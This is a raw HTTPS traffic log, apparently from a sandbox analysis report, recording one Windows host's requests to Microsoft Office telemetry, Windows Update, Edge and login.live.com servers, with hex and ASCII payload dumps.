2024-11-25 10:33:56 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.5	49827	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:56 UTC	191	OUT	GET /rules/rule90401v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:56 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:56 GMT Content-Type: text/xml Content-Length: 1250 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE4487AA" x-ms-request-id: cf1029bf-101e-0017-7ef6-3e47c7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103356Z-15b8b599d88n8stkhC1TEBb78n00000000n000000000c4r6 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:56 UTC	1250	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 39 30 34 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 53 61 6d 70 6c 69 6e 67 50 6f 6c 69 63 79 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 4d 65 74 61 64 61 74 61 22 20 2f 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="90401" V="3" DC="ESM" EN="Office.Telemetry.SamplingPolicy" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" DL="A" DCa="PSP PSU" xmlns=""> <RIS> <RI N="Metadata" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.5	49830	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:56 UTC	192	OUT	GET /rules/rule700201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:56 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:56 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT ETag: "0x8DC582BE39DFC9B" x-ms-request-id: c6f64b36-301e-0000-4706-3deecc000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103356Z-178bfbc474bfw4gbhC1NYCunf400000007b0000000006dv7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:56 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.5	49829	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:56 UTC	192	OUT	GET /rules/rule701200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:56 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:56 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC681E17" x-ms-request-id: 8f8af0b5-d01e-00a1-23c7-3e35b1000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103356Z-178bfbc474bbcwv4hC1NYCypys000000079g000000000xyn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:56 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.5	49831	20.109.210.53	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:57 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=CLr1vYdRECxUGOz&MD=ON2O2D6F HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-25 10:33:57 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: 9c05555d-f99f-41af-bae7-318af91000c6 MS-RequestId: f0f8ee5b-ae05-42ba-be20-87d8f3a74c9f MS-CV: 6Jk9ZRaU9UuuB7EW.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Mon, 25 Nov 2024 10:33:56 GMT Connection: close Content-Length: 30005
2024-11-25 10:33:57 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-11-25 10:33:57 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.5	49838	94.245.104.56	443	7820	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:59 UTC	428	OUT	GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1 Host: api.edgeoffer.microsoft.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 10:34:02 UTC	584	IN	HTTP/1.1 200 OK Content-Length: 0 Connection: close Content-Type: application/x-protobuf; charset=utf-8 Date: Mon, 25 Nov 2024 10:34:02 GMT Server: Microsoft-IIS/10.0 Set-Cookie: ARRAffinity=4c3badee49d7a7bd1a84fc06a7fc4ce1fa385e6541e43b9f60ae9b9ee2cf1cd2;Path=/;HttpOnly;Secure;Domain=api.edgeoffer.microsoft.com Set-Cookie: ARRAffinitySameSite=4c3badee49d7a7bd1a84fc06a7fc4ce1fa385e6541e43b9f60ae9b9ee2cf1cd2;Path=/;HttpOnly;SameSite=None;Secure;Domain=api.edgeoffer.microsoft.com Request-Context: appId=cid-v1:48af8e22-9427-456d-9a55-67a1e42a1bd9 X-Powered-By: ASP.NET

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.5	49839	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:59 UTC	192	OUT	GET /rules/rule700200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:59 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:59 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF66E42D" x-ms-request-id: eac37560-701e-001e-50bf-3ef5e6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103359Z-178bfbc474bvjk8shC1NYC83ns000000073g00000000a9e2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:59 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.5	49842	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:59 UTC	192	OUT	GET /rules/rule701251v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:59 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:59 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE12A98D" x-ms-request-id: aaf9eac1-201e-0000-4977-3ba537000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103359Z-174c587ffdf89smkhC1TEB697s00000005x0000000008ebs x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:59 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.5	49840	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:59 UTC	192	OUT	GET /rules/rule702351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:34:00 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:34:00 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE017CAD3" x-ms-request-id: 1aea6c4a-501e-005b-1055-3dd7f7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103400Z-15b8b599d88tr2flhC1TEB5gk400000005w000000000bq6q x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:34:00 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.5	49843	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:59 UTC	192	OUT	GET /rules/rule701250v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:34:00 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:34:00 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE022ECC5" x-ms-request-id: e7f051b3-801e-00a0-04bf-3e2196000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103400Z-178bfbc474b9xljthC1NYCtw9400000007ag000000001y85 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:34:00 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.5	49841	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:59 UTC	192	OUT	GET /rules/rule702350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:34:00 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:34:00 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE6431446" x-ms-request-id: 161730be-201e-0051-3520-3d7340000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103400Z-178bfbc474bvjk8shC1NYC83ns000000077g000000003f1w x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:34:00 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.5	49845	20.190.147.1	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:00 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
2024-11-25 10:34:00 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
